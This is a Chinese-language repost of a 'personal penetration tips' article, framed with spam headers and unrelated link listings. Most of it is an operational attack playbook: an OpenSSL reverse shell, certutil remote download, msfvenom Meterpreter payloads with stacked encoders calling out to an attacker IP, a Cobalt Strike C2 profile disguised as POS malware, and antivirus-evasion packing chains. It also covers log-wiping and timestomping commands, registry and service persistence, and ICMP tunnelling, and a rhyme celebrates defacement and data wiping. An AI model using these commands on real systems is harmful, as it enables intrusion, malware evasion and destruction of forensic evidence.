在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫(xiě)文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

個(gè)人滲透技巧匯總

jf_hKIAo4na ? 來(lái)源:菜鳥(niǎo)學(xué)安全 ? 2023-05-26 15:13 ? 次閱讀

前言

首先我們拿到一個(gè)站不能心急,凡事三思而行 跑得太快是會(huì)滑倒的 當(dāng)我們獲得目標(biāo)的時(shí)候不要急著用掃描器,這樣會(huì)不僅會(huì)影響服務(wù)器的速度還會(huì)在對(duì)方的服務(wù)器日志生成大量的記錄,什么站能掃什么站不能掃,心里一定要有點(diǎn)b數(shù),不然可能等待的就是不一樣的結(jié)果了。 如果手工測(cè)試無(wú)果后再用代理手法掃描網(wǎng)站,必要的時(shí)候設(shè)置二級(jí)代理。 當(dāng)然!!!!什么站能掃什么站不能掃,心里一定要有點(diǎn)數(shù)! 小提示:在使用proxychains的時(shí)候,程序或者終端選項(xiàng)盡量不要設(shè)置任何協(xié)議的代理,否則可能會(huì)打亂這個(gè)代理回路出現(xiàn)網(wǎng)絡(luò)錯(cuò)誤。

9ddd933e-fafa-11ed-90ce-dac502259ad0.png

淺藍(lán)的滲透測(cè)試導(dǎo)圖以及小工具

一個(gè)導(dǎo)圖,可以做一個(gè)大致的方向參考,跟著方向逐一測(cè)試,期間也可以鞏固基礎(chǔ)。https://github.com/iSafeBlue/Mind-Map/releases

9de88f32-fafa-11ed-90ce-dac502259ad0.png

這里再附一個(gè)滲透工具包,幫助新手熟悉滲透測(cè)試//github.com/lz520520/railgun AWVS + Nessus docker

# 拉取鏡像
  docker pull leishianquan/awvs-nessus:v1
  # 啟動(dòng)
  docker run -it -d -p 13443:3443 -p 8834:8834 leishianquan/awvs-nessus:v1
  # 查看容器
  docker ps –a
  # 啟動(dòng)容器
  docker start container-id
  # 進(jìn)入容器
  docker exec –it container-id /bin/bash


  # 進(jìn)入容器后,啟動(dòng)nessus
  /etc/init.d/nessusd start


  # 訪問(wèn)掃描器地址和賬號(hào)密碼
  Nessus:
  https://127.0.0.1:8834/#/
  account:leishi/leishianquan


  Awvs13:
  https://127.0.0.1:13443/
  account:admin@admin.com/Admin123

ZERO

首先進(jìn)行信息收集你獲得的信息越多對(duì)自己后面的滲透就越有幫助,whois,旁站子域,服務(wù)器操作系統(tǒng)版本,web中間件以及waf與cdn,通過(guò)google與github看看是否存在已知的漏洞這樣有助于快速的獲得權(quán)限, 端口掃描并判斷服務(wù)漏洞加以利用,目錄的fuzz,弱口令的fuzz,google hack 進(jìn)一步探測(cè)網(wǎng)站的信息后臺(tái)以及敏感信息,撒旦天眼也是不錯(cuò)的信息工具。

一.時(shí)刻關(guān)注返回的數(shù)據(jù)包

漏洞有很多種類(lèi)型都需要滲透方認(rèn)證仔細(xì)的對(duì)每個(gè)數(shù)據(jù)包已經(jīng)url進(jìn)行驗(yàn)證,要相信所有的努力都是為成功而付出的。 如XSS,XSRF,sql注入,代碼執(zhí)行,命令執(zhí)行,越權(quán)訪問(wèn),目錄讀取,任意文件讀取,下載,文件包含,遠(yuǎn)程命令執(zhí)行,弱口令,上傳,編輯器漏洞,暴力破解等

驗(yàn)證碼與郵箱以及token的返回泄露,以及后臺(tái)為校驗(yàn)從而可刪除的參數(shù)。
截獲的敏感數(shù)據(jù)參數(shù),學(xué)會(huì)在多個(gè)數(shù)據(jù)包反復(fù)嘗試。
從某個(gè)成功請(qǐng)求中捕獲數(shù)據(jù)包觀察cookie或者token是否存在規(guī)律或加密。
通過(guò)修改返回的狀態(tài)值,觸發(fā)js進(jìn)行邏輯漏洞的滲透。
token的key參數(shù)解密構(gòu)建獲取真實(shí)user密鑰,可拼接、規(guī)律、時(shí)間戳……

下面是網(wǎng)絡(luò)上的滲透三字訣

進(jìn)谷歌  找注入
沒(méi)注入  就旁注
沒(méi)旁注  用0day
沒(méi)0day  猜目錄
沒(méi)目錄  就嗅探
爆賬戶(hù)  找后臺(tái)
傳小馬  放大馬
拿權(quán)限  掛頁(yè)面
放暗鏈  清數(shù)據(jù)
滲透企業(yè)實(shí)戰(zhàn)版
搞企業(yè)  先掃描
掃描器  商業(yè)好
默密碼  都知道
社工庫(kù)  找一找
郵箱號(hào)  先列好
九頭蛇  跑一跑
搞不定  放大招
找插件  挖一挖
發(fā)郵件  憑偽造
沒(méi)郵箱  搞網(wǎng)站
二級(jí)域  皆可爆
老漏洞  沒(méi)修好
新漏洞  刷一票
干研發(fā)  Git 找
源代碼  全都要
C D N  可以跳
防火墻  可以撬
堡壘機(jī)  可以秒
云防護(hù)  可以秒
是企業(yè)  沒(méi)有哪家搞不了!

二.FUZZ的藝術(shù) https://www.freebuf.com/vuls/221129.html

三.WEBBYPASS

linux反彈 shell:

1)VPS 上生成 ssl 證書(shū)的公鑰/私鑰對(duì):
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
2)VPS 監(jiān)聽(tīng)反彈 shell:
openssl s_server -quiet -key key.pem -cert cert.pem -port 80
3)目標(biāo)上回連 shell:
mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect :1024 > /tmp/s; rm /tmp/s


VPS 上已獲取加密的 getshell 了。
winodws桌面:TeamViewerQS單文件 windows下載文件;certutil -urlcache -split -f https://raw.githubusercontent.com/backlion/demo/master/CVE-2017-11882-v1.py test.py 腳本反彈內(nèi)網(wǎng):reGeorg(https://github.com/sensepost/reGeorg) 1.將 tunnel腳本(aspx | ashx | jsp | php)上傳到Web服務(wù)器,訪問(wèn)顯示“Georg says, ‘All seems fine’“,表示腳本運(yùn)行正常。2.在攻擊者機(jī)器上,啟動(dòng)reGeorgSocksProxy.py,監(jiān)聽(tīng)9999 端口,看到 Checking if Georg is ready,確認(rèn)正常運(yùn)行,這個(gè)時(shí)候就可以吧目標(biāo)機(jī)作為跳板了。 waf:中國(guó)蟻劍客戶(hù)端,冰蝎與內(nèi)存馬,反復(fù)嘗試使用編碼字節(jié)繞過(guò)

四.提權(quán)與權(quán)限維持

首先通過(guò)檢查目標(biāo)服務(wù)器的進(jìn)程與可利用服務(wù)以及漏洞ssl加密payload

###生成證書(shū)并寫(xiě)入文件
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -keyout rsaprivate.key -out servercertificate.crt


cat  rsaprivate.key servercertificate.crt >my.pem
###生成payload
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=39.97.167.211 LPORT=6667 --platform windows -a x86 HandLerSSLCert= ./my.pem StagerVerifySSLCert=true -s 42 --smallest -e x86/shikata_ga_nai -i 9 -f raw| msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom --platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "x00x0ax0d" -f raw > /home/xskali/kali/Shecodject/output/shellcode.raw


###監(jiān)聽(tīng)
msfconsole -q -x 'use exploit/multi/handler;set ExitOnSession false;set PAYLOAD windows/meterpreter/reverse_winhttps;set LHOST 192.168.129.128; set LPORT 4445; set HandlerSslCert /home/xskali/kali/Shecodject/output/my.pem;set StagerVerifySSLCert true; set SessionCommunicationTimeout 600 ;set autorunscript post/windows/manage/migrate; run -j -Z'

老牌工具Cobaltstrike+Profiles

上云和隱藏流量參考free教程(https://www.freebuf.com/articles/network/262445.html) 1.利用keytool生成自己的免費(fèi)證書(shū)(可在kali上生成)

keytool -genkey -alias tryblog -keyalg RSA -validity 36500 -keystore tryblog.store
2.C2.profile文件編輯
set sample_name "tryblog POS Malware";


set sleeptime "5000"; # use a ~30s delay between callbacks
set jitter    "10";    # throw in a 10% jitter


set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";


#設(shè)置證書(shū),注意以下內(nèi)容得和你之前生成的證書(shū)一樣
https-certificate {
    set CN       "TRY"; 
    set O        "TRY";   
    set C        "TRY";
    set L        "TRY";
    set OU       "TRY";  
    set ST       "TRY";
    set validity "365";
}
#設(shè)置,修改成你的證書(shū)名稱(chēng)和證書(shū)密碼
code-signer{
    set keystore "tryblog.store";
    set password "tryblog";
    set alias "tryblog";
}


#指定DNS beacon不用的時(shí)候指定到IP地址
set dns_idle "8.8.4.4";


#每個(gè)單獨(dú)DNS請(qǐng)求前強(qiáng)制睡眠時(shí)間
set dns_sleep "0";


#通過(guò)DNS上載數(shù)據(jù)時(shí)主機(jī)名的最大長(zhǎng)度[0-255]
set maxdns    "235";


http-post {
    set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";


    client {
        header "Accept" "text/plain";
        header "Accept-Language" "en-us";
        header "Accept-Encoding" "text/plain";
        header "Content-Type" "application/x-www-form-urltrytryd";


        id {
            netbios;
            parameter "id";
        }


        output {
            base64;
            prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
            print;
        }
    }


    server {
        output {
            print;
        }
    }
}


http-get {
    set uri "/updates";


    client {
        metadata {
            netbiosu;
            prepend "user=";
            header "Cookie";
        }
    }


    server {
        header "Content-Type" "text/plain";


        output {
            base64;
            print;
        }
    }
}
3.驗(yàn)證c2lint,啟動(dòng)服務(wù)端,載入漢化運(yùn)行
./c2lint C2.profile
./teamserver ip:prot ./C2.profile 
java-Dfile.encoding=UTF-8-javaagent:CobaltStrikeCN.jar-XX:ParallelGCThreads=4-XX:+AggressiveHeap-XX:+UseParallelGC-jarcobaltstrike.jar

免殺遠(yuǎn)控整理(來(lái)自Tide團(tuán)隊(duì))

9df296e4-fafa-11ed-90ce-dac502259ad0.jpg

項(xiàng)目地址//github.com/QChiLan/BypassAntiVirus

windows下的免殺生成(順序從上到下依次混淆)

如果需要捆綁正常軟件運(yùn)行使用shellter,如不能過(guò)免殺,再分步測(cè)試以下操作。 cs文件編碼混淆用AVIATOR生成。測(cè)試可以再用python再當(dāng)前目錄打開(kāi)一個(gè)web服務(wù)器:

python3 -m http.server 8080
1.Lime-Crypter 注入線程
2.DeepSeaOBFuscator 封裝
3.CryptoObfuscator 混淆
4.https 證書(shū)修改
5.base64prionx 混淆
6.themida 加殼
7.https 證書(shū)修改
8.viper(在線msf處理平臺(tái)可加特征和簽名很方便) *通用免殺法(簡(jiǎn)單概括就是1.修改特征碼2.花指令免殺3.加殼免殺。)

9dfa486c-fafa-11ed-90ce-dac502259ad0.png

也可以通過(guò)把軟件分塊用殺軟重復(fù)掃描找到特征碼進(jìn)行修改,當(dāng)然也可以通過(guò)加載器的形式更加靠譜但是需要落地多個(gè)文件,c#文件自己封裝推薦avator+掩蓋日可以過(guò)火絨

Veil

Veil是一種免殺生成工具,用于生成繞過(guò)常見(jiàn)防病毒解決方案的metasploit有效負(fù)載。

一些payload加料的技巧

1、通過(guò)ssl與加殼加密palyoad(免殺)2、通過(guò)dns或套cdn傳輸:https://mp.weixin.qq.com/s/fdGnJxDjh1Orb2V76EX8tQ

windows

Exploit批量掃描:Windows-Exploit-Suggester漏洞模塊:https://github.com/SecWiki/windows-kernel-exploitsBITS免殺提權(quán):https://github.com/ohpe/juicy-potato

linux

搜尋配置文件中的明文密碼、sudo濫用Exploit批量掃描:linux-exploit-suggester、linux-exploit-suggester-2漏洞模塊:https://github.com/SecWiki/linux-kernel-exploits

五、日志清理(細(xì)心的安全工程師會(huì)更改位置并定時(shí)備份后滲透主要還是靠細(xì)心)

windows

遇見(jiàn)不能刪除的先停止相關(guān)服務(wù):net stop “task scheduler”系統(tǒng)日志推薦使用工具:clearlog.exemsf清理:clearev ,run event_manager -c

防火墻日志路徑:%systemroot%system32logfiles
IIS日志路徑:%systemroot%system32logfles
windows系統(tǒng)日志:%systemroot%system32config
Scheduler服務(wù)日志:%systemroot%schedlgu.txt
日志在注冊(cè)表的鍵:HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog
系統(tǒng)日志:%SystemRoot%System32WinevtLogsSystem.evtx
安全日志:%SystemRoot%System32WinevtLogsSecurity.evtx
應(yīng)用程序日志:%SystemRoot%System32WinevtLogsApplication.evtx
linux(檢索根目錄以及上級(jí)目錄是否存在備份) 1.清空當(dāng)前用戶(hù)歷史命令并刪除相關(guān)文件:
history -c


echo “”> /root/.bash_history


echo “”> /var/run/utmp
2.清除部分日志:echo “”> /var/log/secure;全刪除如不能刪除使用echo依次覆蓋:rm -f -r /var/log/*;
/var/log/boot.log:錄了系統(tǒng)在引導(dǎo)過(guò)程中發(fā)生的事件,就是Linux系統(tǒng)開(kāi)機(jī)自檢過(guò)程顯示的信息


/var/log/lastlog :記錄最后一次用戶(hù)成功登陸的時(shí)間、登陸IP等信息


/var/log/messages :記錄Linux操作系統(tǒng)常見(jiàn)的系統(tǒng)和服務(wù)錯(cuò)誤信息


/var/log/secure :Linux系統(tǒng)安全日志,記錄用戶(hù)和工作組變壞情況、用戶(hù)登陸認(rèn)證情況


/var/log/btmp :記錄Linux登陸失敗的用戶(hù)、時(shí)間以及遠(yuǎn)程IP地址


/var/log/syslog:只記錄警告信息,常常是系統(tǒng)出問(wèn)題的信息,使用lastlog查看


/var/log/wtmp:該日志文件永久記錄每個(gè)用戶(hù)登錄、注銷(xiāo)及系統(tǒng)的啟動(dòng)、停機(jī)的事件,使用last命令查看


/var/log/maillog 與郵件相關(guān)的日志信息


/var/log/cron 與定時(shí)任務(wù)相關(guān)的日志信息


/var/log/spooler 與UUCP和news設(shè)備相關(guān)的日志信息


/var/log/auth.log 系統(tǒng)授權(quán)信息,包括用戶(hù)登錄和使用的權(quán)限機(jī)制等 (debian)


/var/run/utmp:該日志文件記錄有關(guān)當(dāng)前登錄的每個(gè)用戶(hù)的信息。如who、w、users、finger等就需要訪問(wèn)這個(gè)文件
3.更新test.txt的時(shí)間和test2.txt時(shí)間戳相同:touch -r test.txt test2.txt;設(shè)定時(shí)間戳:touch -t 201605171210.20 test.txt

web容器路徑

數(shù)據(jù)庫(kù)通過(guò)查詢(xún)配置文件定位日志(如mysql的配置文件文件my.inf,tomcat的配置文件tomcat-user.xml) winodws

capche: C:Program FilesApache Software FoundationApache2.2htdocs"
tomact:CProgram Filestomcatlog
nignx: CProgram Filesnginx-1.14.2logs
linux
tomcat:/usr/local/tomcat/logs/
apche: /usr/local/apache/logs/access_log
nignx:/var/log/httpd/error_logrm-f-r/var/log/*
七、后滲透與流量隱匿

frsocks+protoplex+流量重定向?qū)崿F(xiàn)端口復(fù)用

protoplex是一個(gè)協(xié)議復(fù)用的工具,比如以下命令可將本地9999端口的流量根據(jù)協(xié)議類(lèi)型轉(zhuǎn)到本地的2333和80端口。用于繞過(guò)云主機(jī)的nsg安全規(guī)則。

./frsocks -sockstype fsocks -listen 2333  //創(chuàng)建本地監(jiān)聽(tīng)
./protoplex --socks5 192.168.154.130:2333 --http 127.0.0.1:80 -b 192.168.154.130:9999  //端口分流,根據(jù)協(xié)議類(lèi)型轉(zhuǎn)到本地的2333和80端口
重定向命令 linux:
sudo iptables -t nat -A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 9999
windows:
netsh interface portproxy add v4tov4 listenport=80 listen address=192.168.154.129 connectport=9999 connectaddress=192.168.154.129
netsh interface portproxy show all //查看轉(zhuǎn)發(fā)規(guī)則
netsh interface portproxy reset   //清除所有轉(zhuǎn)發(fā)規(guī)則

將 IP 流量封裝進(jìn) IMCP 的 ping 數(shù)據(jù)包進(jìn)行傳輸

工具如下 1、icmptunnel:https://github.com/jamesbarlow/icmptunnel 2、ptunnel:http://www.cs.uit.no/~daniels/PingTunnel/ 3、icmpsh:https://github.com/inquisb/icmpsh 4、Powershell-ICMP:https://github.com/api0cradle/Powershell-ICMP 5、復(fù)雜的網(wǎng)絡(luò)環(huán)境可以使用EarchWorm(ew)實(shí)現(xiàn)多級(jí)代理訪問(wèn)目標(biāo)主機(jī)

后滲透

ps:合理利用后滲透插件可以剩下很多時(shí)間,但是要注意痕跡清理。插件有謝公子和梼杌完整版比較常用,Cobaltstrike推薦插件:謝公子、梼杌、Z1-AggressorScripts、ladong

9e038b66-fafa-11ed-90ce-dac502259ad0.png

9e0b37da-fafa-11ed-90ce-dac502259ad0.png

詳情參考這個(gè):https://blog.csdn.net/qq_33020901/article/details/98357659 添加開(kāi)機(jī)自啟

reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v "Keyname" /t REG_SZ /d "C:UsersKingXL1.exe" /f 


reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v "test" /t REG_SZ /d "C:UsersKingXL1.exe" /f
sc create "server power" binpath= "C:WindowsSystem32config.exe"
//設(shè)置服務(wù)的描述字符串
sc description "server power" "description" 
//設(shè)置這個(gè)服務(wù)為自動(dòng)啟動(dòng)
sc config "server power" start= auto 
net start "server power" 啟動(dòng)服務(wù)

八、 一個(gè)便捷的HACK瀏覽器(上火狐開(kāi)發(fā)者版本也不錯(cuò))

這里個(gè)人做一個(gè)備份有需求的自行g(shù)oogle,解釋一下英文的插件功能。

9e1535aa-fafa-11ed-90ce-dac502259ad0.png

9e1cb366-fafa-11ed-90ce-dac502259ad0.png9e252bfe-fafa-11ed-90ce-dac502259ad0.png Ajax Interceptor:可以自定義ajax的json返回值,前端測(cè)試用。 Anti-HoneyPot:紅隊(duì)用,可以檢查網(wǎng)頁(yè)中的蜜罐鏈接并提示。 ApiRequest.io Ajax Capture Debugging Tool:這個(gè)是神器!!強(qiáng)推,可以測(cè)試網(wǎng)頁(yè)中任何的ajax請(qǐng)求包括跨站ajax請(qǐng)求重放,官網(wǎng)提供了只30天的請(qǐng)求歷史記錄記得保存重要請(qǐng)求。 Decentraleyes:可以攔截一些cdn和本地的文件跟蹤器 APK Downloader for Google Play Store :免google框架在線下載應(yīng)用商店的app。 Buster Captcha Solver for Humans:過(guò)goole驗(yàn)證碼,有時(shí)候識(shí)別會(huì)比較慢。 Easy WebRTC Block:干掉webrtc的ip回顯,避免泄露真實(shí)ip IP Whois & Flags Chrome & Websites Rating:自動(dòng)在后臺(tái)測(cè)試當(dāng)前網(wǎng)站ip的歸屬地然后以小圖標(biāo)的形式返回給前臺(tái)非常便捷,點(diǎn)擊進(jìn)去還可以看到cdn以及whois信息。 NoScript: 慎用,此插件可以強(qiáng)力的攔截網(wǎng)頁(yè)上的追蹤器來(lái)保護(hù)用戶(hù)的隱私與真實(shí)信息,但是會(huì)造成許多網(wǎng)站打開(kāi)異常。 Identify web technologies :可以幫你分析當(dāng)前網(wǎng)站所使用的網(wǎng)絡(luò)技術(shù)與框架。 Shodan:網(wǎng)絡(luò)搜索引擎同fofa與鐘馗之眼,互聯(lián)網(wǎng)設(shè)備大殺器 Picture-in-Picture Extension:畫(huà)中畫(huà)懸浮窗口看視頻 SourceDetector:可以再后臺(tái)默默的掃描是否有源代碼泄露 HackTools:方便懶人使用點(diǎn)擊擴(kuò)展可快速?gòu)?fù)制sql,xss,反彈shell。 FindSomething :基于瀏覽器插件的被動(dòng)式信息提取工具

審核編輯:彭靜
聲明:本文內(nèi)容及配圖由入駐作者撰寫(xiě)或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • 服務(wù)器
    +關(guān)注

    關(guān)注

    13

    文章

    9727

    瀏覽量

    87427
  • 程序
    +關(guān)注

    關(guān)注

    117

    文章

    3825

    瀏覽量

    82542
  • 掃描器
    +關(guān)注

    關(guān)注

    0

    文章

    180

    瀏覽量

    12302

原文標(biāo)題:干貨 | 個(gè)人滲透技巧匯總(避坑)筆記

文章出處:【微信號(hào):菜鳥(niǎo)學(xué)安全,微信公眾號(hào):菜鳥(niǎo)學(xué)安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏

    評(píng)論

    相關(guān)推薦
    熱點(diǎn)推薦

    LABVIEW資料匯總

    將最近所收集到的好東西刪減匯總。。對(duì)個(gè)人學(xué)習(xí)很有用處
    發(fā)表于 07-16 15:37

    【原創(chuàng)首發(fā)】跟我一起學(xué)Linux滲透-BT5實(shí)戰(zhàn)【二】

    【原創(chuàng)首發(fā)】跟我一起學(xué)Linux滲透-BT5實(shí)戰(zhàn)【二】我們接著上一個(gè)內(nèi)容繼續(xù)學(xué)習(xí),一、BT5VMtools的安裝(實(shí)現(xiàn)虛擬機(jī)和主機(jī)共用剪切板等)二、中文包的安裝(實(shí)現(xiàn)漢化)三、最近正在看的一本書(shū):BackTrack 4 利用滲透測(cè)試保證系統(tǒng)安全下載:http://yunp
    發(fā)表于 09-08 00:29

    靜態(tài)滲透除濕和動(dòng)態(tài)除濕方式的區(qū)別

    `靜態(tài)滲透標(biāo)準(zhǔn)除濕和動(dòng)態(tài)高速除濕機(jī)型的特點(diǎn)常溫自動(dòng)干燥產(chǎn)品的除濕速度,除了間隙式除濕慢于連續(xù)除濕之外,間隙式除濕的產(chǎn)品 按結(jié)構(gòu)不同還分為靜態(tài)滲透除濕和動(dòng)態(tài)高速除濕兩種。靜態(tài)除濕機(jī)型,是傳統(tǒng)的標(biāo)準(zhǔn)型
    發(fā)表于 09-29 11:12

    基于labview的混凝土滲透性監(jiān)測(cè)系統(tǒng)

    基于labview的混凝土滲透性監(jiān)測(cè)系統(tǒng)(1)8個(gè)測(cè)試通道,精確測(cè)量通過(guò)混凝土試件的電流(±1%),并實(shí)時(shí)顯示測(cè)試電流值;(2)自動(dòng)檢測(cè)測(cè)試溶液的溫度,實(shí)時(shí)顯示溫度值;(3)實(shí)時(shí)的計(jì)算電通量,保存實(shí)驗(yàn)數(shù)據(jù); (4)自動(dòng)得出混凝土氯離子滲透性指標(biāo),顯示和輸出測(cè)量結(jié)果。
    發(fā)表于 05-29 00:12

    SMT焊點(diǎn)的染色與品牌焊錫絲滲透試驗(yàn)

    `SMT焊點(diǎn)的染色與品牌焊錫絲滲透試驗(yàn)隨著SMT技術(shù)與一些品牌焊錫絲及元器件高密封裝技術(shù)的迅速發(fā)展,很多品牌焊錫絲隱藏的焊點(diǎn)缺陷很難用直觀的方法發(fā)現(xiàn),焊點(diǎn)的質(zhì)量與可靠性的檢測(cè)試驗(yàn)技術(shù)必須適應(yīng)這種快速
    發(fā)表于 05-03 17:46

    個(gè)人的學(xué)習(xí)資料匯總

    本帖最后由 nyjingle 于 2020-8-11 10:09 編輯 【個(gè)人的學(xué)習(xí)資料匯總貼】MYMINIEYE:60天FPGA工程師入門(mén)就業(yè)項(xiàng)目實(shí)戰(zhàn)特訓(xùn)營(yíng)(視頻+開(kāi)發(fā)板)http
    發(fā)表于 08-07 11:16

    物聯(lián)網(wǎng)滲透擴(kuò)圍

    物聯(lián)網(wǎng)進(jìn)階:連接力強(qiáng)化和NB-IoT應(yīng)用滲透
    發(fā)表于 01-25 06:28

    web滲透的測(cè)試流程

      滲透測(cè)試是什么?網(wǎng)絡(luò)安全學(xué)習(xí)中,web滲透的測(cè)試流程是怎樣的?后滲透的詳細(xì)步驟解析如何?  滲透測(cè)試就是利用我們所掌握的滲透知識(shí),對(duì)網(wǎng)站
    發(fā)表于 01-29 17:27

    渦流的形成范圍和滲透深度與哪些因素有關(guān)呢?

      渦流是由于金屬導(dǎo)體中存在的自感電動(dòng)勢(shì)產(chǎn)生的環(huán)流。渦流的形成范圍和滲透深度取決于多個(gè)因素:  1.導(dǎo)體的電導(dǎo)率:電導(dǎo)率越高,渦流的形成范圍越小,滲透深度越淺。  2.導(dǎo)體的尺寸和形狀:尺寸越小
    發(fā)表于 03-13 17:38

    新能源汽車(chē)滲透率將迎來(lái)增長(zhǎng)拐點(diǎn) 整個(gè)行業(yè)將進(jìn)入淘汰賽

    近期,小鵬汽車(chē)總裁顧宏地在一場(chǎng)論壇上表示,新能源汽車(chē)的滲透率有望在未來(lái)兩到三年內(nèi)達(dá)到 10%,迎來(lái)行業(yè)爆發(fā)性增長(zhǎng)的拐點(diǎn)。目前,新能源汽車(chē)的滲透率只有 5%,他從個(gè)人電腦、智能手機(jī)等行業(yè)的發(fā)展經(jīng)驗(yàn)判斷,一般新技術(shù)沖擊傳統(tǒng)產(chǎn)品,
    發(fā)表于 11-19 16:01 ?713次閱讀

    WEB滲透與IOT滲透的區(qū)別分析與IOT滲透測(cè)試功能特點(diǎn)

    幾維安全I(xiàn)OT滲透測(cè)試是一項(xiàng)基于STRIDE模型對(duì)功能業(yè)務(wù)進(jìn)行威脅發(fā)現(xiàn)的安全檢測(cè)服務(wù)。通過(guò)對(duì)智能終端應(yīng)用系統(tǒng)的架構(gòu)設(shè)計(jì)分析著手,然后對(duì)其架構(gòu)設(shè)計(jì)中的業(yè)務(wù)功能實(shí)現(xiàn)進(jìn)行威脅分析,得到業(yè)務(wù)可能面臨的威脅點(diǎn)
    的頭像 發(fā)表于 08-05 11:36 ?3756次閱讀

    白盒滲透測(cè)試的優(yōu)勢(shì)是什么

    滲透測(cè)試是一項(xiàng)重要的進(jìn)攻性安全演習(xí)或操作。如果執(zhí)行得當(dāng),它會(huì)極大地提高您組織的安全性。滲透測(cè)試分為三種類(lèi)型,根據(jù)滲透測(cè)試人員或道德黑客可獲得的信息量分類(lèi),其中一種是白盒滲透測(cè)試。 什么
    的頭像 發(fā)表于 09-19 10:04 ?1422次閱讀

    滲透測(cè)試和邊緣

    滲透測(cè)試和邊緣
    的頭像 發(fā)表于 01-03 09:45 ?813次閱讀
    <b class='flag-5'>滲透</b>測(cè)試和邊緣

    個(gè)人滲透技巧匯總(避坑)筆記

    當(dāng)我們獲得目標(biāo)的時(shí)候不要急著用掃描器,這樣會(huì)不僅會(huì)影響服務(wù)器的速度還會(huì)在對(duì)方的服務(wù)器日志生成大量的記錄,什么站能掃什么站不能掃,心里一定要有點(diǎn)b數(shù),不然可能等待的就是不一樣的結(jié)果了。
    的頭像 發(fā)表于 03-30 09:35 ?1829次閱讀

    什么是滲透作用_金屬封裝又是如何發(fā)生滲透

    ? 滲透作用使得芯片封裝中沒(méi)有絕對(duì)的氣密性封裝,那么什么是滲透作用?金屬封裝又是如何發(fā)生滲透的呢??? 滲透:氣體從密度大的一側(cè)向密度小的一側(cè)滲入、擴(kuò)散、通過(guò)、和逸出固體阻擋層的過(guò)程。
    的頭像 發(fā)表于 11-22 10:27 ?882次閱讀
    主站蜘蛛池模板: 女人张开腿 让男人桶视频 女人张开腿等男人桶免费视频 | 精品国产三级a∨在线 | 日韩三级免费 | 国产va免费精品 | 色色色爱 | 色网站视频 | 久久国产成人午夜aⅴ影院 久久国产福利 | 一级黄色片欧美 | 亚洲最大的成人网 | 奇米影视四色首页手机在线 | 狠狠躁夜夜躁人人爽天天3 狠狠躁夜夜躁人人爽天天段 | 欧美经典三级春潮烂漫海棠红 | 456成人网 | 97人摸人人澡人人人超一碰 | 日韩欧美在线中文字幕 | 精品亚洲午夜久久久久 | 国产呦系列呦交 | 手机看高清特黄a大片 | 日本三级视频在线播放 | 国产成人优优影院 | 日本午夜片成年www 日本午夜三级 | 国产资源站 | 黄到让你下面湿的视频 | 欧美性猛交xxxx免费看久久 | 精品国产免费观看一区高清 | 色综合综合色综合色综合 | 日本视频一区在线观看免费 | 色激情五月 | 午夜免费视频观看在线播放 | 免费大片看黄在观看 | 色偷偷91久久综合噜噜噜噜 | 美女国产| videos另类重口tv| 日本一区二区三区在线网 | 26uuu欧美日本| 日本a网 | 亚洲一区日本 | 亚洲最大的成网4438 | 一区二区三区四区在线观看视频 | 日韩欧美亚洲综合一区二区 | 日日噜噜噜夜夜爽爽狠狠视频 |